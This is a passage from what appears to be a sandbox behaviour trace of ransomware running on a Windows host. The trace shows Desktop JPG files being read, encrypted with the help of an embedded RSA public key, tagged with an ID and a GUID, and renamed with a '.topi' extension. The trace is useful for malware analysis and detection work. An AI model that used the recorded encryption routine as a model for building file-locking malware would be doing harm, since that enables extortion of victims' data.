(in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb568 | out: hHeap=0x680000) returned 1 [0094.332] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7doP5kfmX.jpg") returned=".jpg" [0094.332] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7doP5kfmX.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7dop5kfmx.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0094.332] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=74392) returned 1 [0094.332] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0094.334] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x12272, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.335] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0094.335] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0094.335] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0094.335] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.335] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0x12298, lpOverlapped=0x0) returned 1 [0094.336] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0094.336] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0094.336] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0094.336] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0094.336] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df3c0) returned 1 [0094.337] CryptCreateHash (in: hProv=0x6df3c0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0094.337] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0094.337] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0094.337] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0094.337] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0094.337] GetLastError () returned 0x0 [0094.337] CryptDestroyHash (hHash=0x31c7580) returned 1 [0094.337] CryptReleaseContext (hProv=0x6df3c0, dwFlags=0x0) returned 1 [0094.337] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0094.337] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0094.337] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0094.338] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0094.338] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0094.338] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0094.338] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0094.338] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x122a0) returned 0x99f52d8 [0094.338] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0094.338] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0094.338] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x3193e68 [0094.338] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0094.338] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x320fab0 [0094.338] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0094.338] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d36e8 [0094.338] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8f58 [0094.338] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d3a90 [0094.338] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8f70 [0094.338] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8f40 [0094.338] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0094.338] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8fb8 [0094.338] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0094.338] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x31ce620 [0094.339] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x31ce620, Size=0x218) returned 0x3165e90 [0094.339] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x31d01f0 [0094.339] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8f40 | out: hHeap=0x680000) returned 1 [0094.339] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8fb8 | out: hHeap=0x680000) returned 1 [0094.339] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0094.339] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0094.339] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0094.339] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0094.339] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e958 [0094.339] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d8fb8 [0094.339] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314d0a8 [0094.339] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99d8f40 [0094.339] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e998 [0094.339] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0094.339] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0094.339] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9c28 [0094.339] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0094.339] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0094.339] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0094.339] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0094.339] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0094.339] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8fb8 | out: hHeap=0x680000) returned 1 [0094.339] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0094.339] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8f40 | out: hHeap=0x680000) returned 1 [0094.339] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0094.339] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0094.339] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0094.339] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0094.339] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0094.339] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3165e90 | out: hHeap=0x680000) returned 1 [0094.339] GetCurrentThreadId () returned 0x8c4 [0094.340] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0094.340] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x6e14c0 [0094.340] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0094.340] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df3c0 [0094.340] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0094.340] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0094.340] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0094.340] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0094.340] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.340] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.340] GetCurrentThreadId () returned 0x8c4 [0094.340] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.340] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.340] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x99e4988 [0094.340] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.340] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.340] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.340] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.340] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4988 | out: hHeap=0x680000) returned 1 [0094.340] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0094.340] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0094.340] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb568 [0094.340] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0094.340] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0094.340] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0094.340] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0094.340] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0094.340] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0094.340] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0094.341] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0094.341] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0094.341] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0094.341] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0094.341] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0094.341] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8f40 [0094.341] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0094.341] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9b8 [0094.341] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0094.341] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0094.341] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0094.341] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0094.341] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0094.341] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8fb8 [0094.341] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0094.341] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0094.341] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0094.341] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8f88 [0094.341] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0094.341] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0094.341] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0094.341] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0094.341] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0094.341] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0094.341] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0094.341] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d8fd0 [0094.341] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0094.342] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d8e68 [0094.342] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0094.342] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e918 [0094.342] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0094.342] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0094.342] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0094.342] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0094.342] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8f40 | out: hHeap=0x680000) returned 1 [0094.342] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8f40 [0094.342] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0094.342] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e8eb0 [0094.342] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0094.342] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0094.342] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0094.342] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9300 [0094.342] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0094.342] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0094.342] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0094.342] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0094.342] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8f40 | out: hHeap=0x680000) returned 1 [0094.342] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x3165e90 [0094.342] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0094.343] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0094.343] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0094.343] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df3c0 | out: hHeap=0x680000) returned 1 [0094.343] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0094.343] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0094.343] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0094.343] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0094.343] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0094.343] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3165e90 | out: hHeap=0x680000) returned 1 [0094.343] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0094.343] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0094.343] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8fd0 | out: hHeap=0x680000) returned 1 [0094.343] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0094.343] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0094.343] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0094.343] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8fb8 | out: hHeap=0x680000) returned 1 [0094.343] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8f88 | out: hHeap=0x680000) returned 1 [0094.343] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0094.343] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0094.343] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0094.343] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8f70 | out: hHeap=0x680000) returned 1 [0094.344] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d3a90 | out: hHeap=0x680000) returned 1 [0094.344] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0094.344] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dee58 | out: hHeap=0x680000) returned 1 [0094.344] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb568 | out: hHeap=0x680000) returned 1 [0094.344] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0094.344] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0094.344] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0094.344] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0094.344] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9c28 | out: hHeap=0x680000) returned 1 [0094.344] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x320fab0 | out: hHeap=0x680000) returned 1 [0094.344] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0094.344] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3193e68 | out: hHeap=0x680000) returned 1 [0094.344] WriteFile (in: hFile=0x6a8, lpBuffer=0x99f52d8*, nNumberOfBytesToWrite=0x12293, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x99f52d8*, lpNumberOfBytesWritten=0x9ccfb14*=0x12293, lpOverlapped=0x0) returned 1 [0094.344] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f52d8 | out: hHeap=0x680000) returned 1 [0094.344] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x12298, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.344] WriteFile (in: hFile=0x6a8, lpBuffer=0x99dea38*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99dea38*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0094.345] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0094.345] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316df90 [0094.345] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x31d01f0 [0094.345] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x31d01f0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0094.345] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d0980 [0094.345] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0094.345] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316df90 | out: hHeap=0x680000) returned 1 [0094.345] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d0980*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d0980*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0094.345] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d0980 | out: hHeap=0x680000) returned 1 [0094.345] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0094.345] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0094.345] CloseHandle (hObject=0x6a8) returned 1 [0094.346] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x3161e60 [0094.346] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x880) returned 0x31cf750 [0094.346] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3161e60 | out: hHeap=0x680000) returned 1 [0094.346] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7doP5kfmX.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7dop5kfmx.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7doP5kfmX.jpg.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7dop5kfmx.jpg.topi")) returned 1 [0094.347] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0094.347] HeapFree (in: hHeap=0x680000, 